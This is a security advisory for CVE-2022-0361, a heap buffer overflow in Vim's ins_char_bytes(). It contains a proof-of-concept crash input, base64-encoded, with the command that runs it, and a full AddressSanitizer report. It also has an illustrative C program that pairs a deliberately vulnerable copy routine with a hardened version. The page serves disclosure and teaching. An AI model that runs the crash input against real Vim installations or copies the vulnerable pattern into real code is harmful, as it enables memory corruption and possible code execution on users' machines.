Headline
CVE-2022-0361: Heap-based Buffer Overflow in vim
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
Description
Heap overflow with an out-of-bounds write of 41 bytes: a memmove() in ins_char_bytes() writes past the end of a 3-byte heap allocation (see the AddressSanitizer report below).
The overflow corrupts adjacent heap chunk metadata (unsorted bin doubly linked list corruption in glibc malloc).
Commit hash: 058ee7c5699ef551be5aa04c66b3cffc436e9b08
Proof of Concept
$ echo -ne "bm9ybTBv7wX//wUwIDUwMDAwMDAwezAtMDAwMP/yAAD6MDAwMDAwMDAwMDQwKSkpMDAQMDAwMDAw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=" | base64 -d > poc
$ /home/alkyne/fuzzing/vim_asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
ïÿ0 50000000{0-01777777777777777777777ÿò
ïÿ0 50000000{0-01777777777777777777777ÿò
=================================================================
==3619358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000007473 at pc 0x000000495b45 bp 0x7ffd1dd9e330 sp 0x7ffd1dd9daf8
WRITE of size 41 at 0x602000007473 thread T0
#0 0x495b44 in __asan_memmove (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44)
#1 0x51ee94 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10
#2 0x51ee94 in ins_char_bytes /home/alkyne/fuzzing/vim_asan/src/change.c:1094:2
#3 0x51f6fe in ins_char /home/alkyne/fuzzing/vim_asan/src/change.c:1003:5
#4 0x988589 in swapchar /home/alkyne/fuzzing/vim_asan/src/ops.c:1445:6
#5 0x99b554 in swapchars /home/alkyne/fuzzing/vim_asan/src/ops.c:1379:16
#6 0x99b554 in op_tilde /home/alkyne/fuzzing/vim_asan/src/ops.c:1303:17
#7 0x99b554 in do_pending_operator /home/alkyne/fuzzing/vim_asan/src/ops.c:4109:3
#8 0x93bb29 in normal_cmd /home/alkyne/fuzzing/vim_asan/src/normal.c:1146:2
#9 0x70ce2b in exec_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c
#10 0x70bb3c in exec_normal_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8601:5
#11 0x70bb3c in ex_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8519:6
#12 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
#13 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
#14 0xbbae2d in do_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1512:5
#15 0xbb8e8c in cmd_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1098:14
#16 0xbb8e8c in ex_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1124:2
#17 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
#18 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
#19 0xf99d44 in exe_commands /home/alkyne/fuzzing/vim_asan/src/main.c:3091:2
#20 0xf99d44 in vim_main2 /home/alkyne/fuzzing/vim_asan/src/main.c:774:2
#21 0xf9677f in main /home/alkyne/fuzzing/vim_asan/src/main.c:426:12
#22 0x7fdf81c100b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#23 0x41da9d in _start (/home/alkyne/fuzzing/vim_asan/src/vim+0x41da9d)
0x602000007473 is located 0 bytes to the right of 3-byte region [0x602000007470,0x602000007473)
allocated by thread T0 here:
#0 0x4961dd in malloc (/home/alkyne/fuzzing/vim_asan/src/vim+0x4961dd)
#1 0x4c5e15 in lalloc /home/alkyne/fuzzing/vim_asan/src/alloc.c:248:11
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44) in __asan_memmove
Shadow bytes around the buggy address:
0x0c047fff8e30: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e50: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
=>0x0c047fff8e80: fa fa 02 fa fa fa 03 fa fa fa 01 fa fa fa[03]fa
0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3619358==ABORTING
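The report above shows a 41-byte tail copy landing exactly at the end of a 3-byte region returned by lalloc(): the size of the new line buffer and the size of the tail being shifted were computed from values that disagree. The C program below is an added model of that bug class written for this page; it is not Vim's ins_char_bytes() and the function names, the constructed input line and the 2-byte to 3-byte replacement are assumptions made for illustration, not a claim about Vim's case tables. replace_bytes_vuln() reproduces the shape of the bug by sizing the new buffer from a caller-supplied cached length while copying the tail from the real one; replace_bytes_checked() derives every length from the buffer it copies from, rejects an edit outside the line, and cannot write past its allocation. write_fits() is the arithmetic check to apply to the numbers in any sanitizer report of this kind.

```c
/*
 * Added model of the overflow pattern (illustrative code for this page, not Vim's).
 * A line edit allocates a fresh buffer and copies head, replacement and tail into
 * it.  If the allocation size and the tail length come from different notions of
 * the line length, the tail memmove() overruns the new buffer, which is the
 * shape of the heap-buffer-overflow reported above (3-byte region, 41-byte write).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable model: replace `oldcharlen` bytes at `col` with `replen` bytes of
 * `repl`.  `cached_len` is the caller's (possibly stale) idea of the line
 * length.  Safe only while cached_len equals strlen(oldp). */
static unsigned char *replace_bytes_vuln(const unsigned char *oldp, size_t cached_len,
                                         size_t col, size_t oldcharlen,
                                         const unsigned char *repl, size_t replen)
{
    size_t linelen = strlen((const char *)oldp);          /* real length */
    /* BUG (modelled): allocation sized from cached_len, not from linelen */
    unsigned char *newp = malloc(cached_len - oldcharlen + replen + 1);
    if (newp == NULL) return NULL;
    memmove(newp, oldp, col);                              /* head */
    memcpy(newp + col, repl, replen);                      /* replacement */
    /* tail plus NUL, sized from the real length: runs past newp whenever
     * cached_len < linelen */
    memmove(newp + col + replen, oldp + col + oldcharlen,
            linelen - col - oldcharlen + 1);
    return newp;
}

/* Hardened form: one source of truth for the length, bounds validated before
 * any arithmetic can underflow, allocation sized from the same numbers the
 * copies use.  Returns the new line (caller frees) and its length in *outlen,
 * or NULL when col/oldcharlen fall outside the line. */
static unsigned char *replace_bytes_checked(const unsigned char *oldp,
                                            size_t col, size_t oldcharlen,
                                            const unsigned char *repl, size_t replen,
                                            size_t *outlen)
{
    size_t linelen = strlen((const char *)oldp);
    if (col > linelen || oldcharlen > linelen - col)
        return NULL;                                       /* edit outside the line */
    size_t taillen = linelen - col - oldcharlen;
    size_t newlen = col + replen + taillen;
    unsigned char *newp = malloc(newlen + 1);
    if (newp == NULL) return NULL;
    memcpy(newp, oldp, col);
    memcpy(newp + col, repl, replen);
    memcpy(newp + col + replen, oldp + col + oldcharlen, taillen);
    newp[newlen] = '\0';
    if (outlen) *outlen = newlen;
    return newp;
}

/* Does a write of `nbytes` starting at `offset` fit inside `cap` bytes?
 * Apply it to the numbers in a sanitizer report to confirm the overrun. */
static int write_fits(size_t cap, size_t offset, size_t nbytes)
{
    return offset <= cap && nbytes <= cap - offset;
}

int main(void)
{
    /* constructed input: 'a', U+00FF (2 bytes in UTF-8), 'b'; the 2-byte
     * character is replaced by a 3-byte one so the line grows, the situation a
     * case swap that changes byte length creates */
    const unsigned char line[] = "a\xc3\xbf" "b";
    const unsigned char repl[] = "\xe2\xb1\xbe";
    size_t n = 0;

    unsigned char *out = replace_bytes_checked(line, 1, 2, repl, 3, &n);
    if (out == NULL) return 1;
    printf("checked: new length %zu\n", n);
    free(out);

    /* the vulnerable routine is fine only while its cached length is current */
    unsigned char *v = replace_bytes_vuln(line, strlen((const char *)line), 1, 2, repl, 3);
    if (v == NULL) return 1;
    free(v);

    /* numbers from the report above: 3-byte region, 41-byte write at its end */
    printf("41-byte write at offset 3 of a 3-byte region fits: %d\n", write_fits(3, 3, 41));
    return 0;
}
```

The edit in the report is reached through the ~ operator (op_tilde, swapchar), so the model replaces one character with another of a different byte length; the point is the length bookkeeping, not the particular characters.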
Impact
A heap overflow of this kind may lead to arbitrary code execution in the context of the user running Vim when a crafted file or script is opened.
Related news
Ubuntu Security Notice 6026-1 - It was discovered that Vim was incorrectly processing Vim buffers. An attacker could possibly use this issue to perform illegal memory access and expose sensitive information. This issue only affected Ubuntu 20.04 LTS. It was discovered that Vim was using freed memory when dealing with regular expressions inside a visual selection. If a user were tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service, or possibly achieve code execution with user privileges. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.